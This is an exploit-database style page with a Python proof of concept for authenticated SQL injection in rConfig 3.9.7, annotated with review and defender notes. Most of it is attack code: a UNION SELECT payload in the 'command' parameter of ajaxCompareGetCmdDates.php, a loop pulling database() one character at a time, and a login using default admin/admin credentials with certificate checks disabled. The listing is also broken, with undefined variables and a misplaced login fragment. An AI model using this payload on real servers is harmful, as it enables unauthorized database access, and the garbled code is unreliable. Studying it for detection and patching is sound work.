Exploits / Vulnerability Discovered : 2023-03-31 |
Type : webapps |
Platform : php
This exploit / vulnerability, rConfig 3.9.7 SQL injection (authenticated), is provided for educational purposes only; if you use it, you do so at your own risk!
# Command-line handling: exactly one positional argument is expected, the
# hostname or IP address of the rConfig server under test.
# The value is taken as given; get_data() concatenates it straight into the
# request URL, so nothing here checks that it is a well-formed host.
if len(sys.argv) == 2:
    host = sys.argv[1]
else:
    print("Usage: python3 rconfig_sqli_3.9.7.py <host>")
    sys.exit(1)
def get_data(host):
    """Issue the PoC's probe requests against rConfig's ajaxCompareGetCmdDates.php.

    Each request places a ``' union select ...`` payload in the ``command``
    query parameter and asks for one character position of ``database()``
    (positions 1 through 99, one request per position).

    Args:
        host: Hostname or IP of the rConfig server. It is concatenated into
            the URL as given; HTTPS on port 443 is hard-coded.

    NOTE(review): in the lines visible here ``res`` is never read,
    ``result_data`` is never updated and nothing is returned, so the listing
    looks truncated. ``requests`` and ``s`` are not defined in this excerpt
    either; ``s`` is presumably a logged-in ``requests.Session`` -- confirm
    against the full script.

    Defender notes: in web-server logs this appears as a burst of GET
    requests to ``/lib/ajaxHandlers/ajaxCompareGetCmdDates.php`` whose
    ``command`` value contains ``union``/``select``/``substr``/``ord`` and
    which differ only in the position index. A payload of this shape only
    works if the handler builds its SQL by string concatenation; the
    server-side fix is to bind ``command`` as a query parameter.
    """
    print("[+] Get db data...")
    # The injection point is the `command` parameter. The two {} slots are
    # filled by .format() in the loop with the SQL expression and the
    # character position; %2b is a URL-encoded "+" and %20 a space.
    vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20"
    query_exp = "database()"
    result_data = ""
    for i in range(1, 100):
        # NOTE(review): rebuilt on every iteration but never passed to the
        # requests.get() call below, so these headers are not sent.
        burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"}
        # verify=False disables TLS certificate validation, so the server's
        # identity is not checked. The call goes through requests.get with
        # s.cookies attached rather than through s itself.
        res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False)
        # print(res.text)
# NOTE(review): the two statements below use `url`, `headers` and `s`, none of
# which is defined anywhere in this excerpt; they look like the body of a
# login step whose surrounding lines were lost from the page. As shown, they
# would fail with NameError before get_data() is reached.
#
# The form fields match the "(authenticated)" in the page title: the request
# needs a valid rConfig account. The page's own comment says the default is
# admin/admin, so on the defensive side changing default credentials and
# limiting who can reach the web UI narrows exposure to this issue.
data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin
# verify=False: TLS certificate validation is turned off for the login POST.
response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False)
# Runs the probe loop against the host given on the command line.
get_data(host)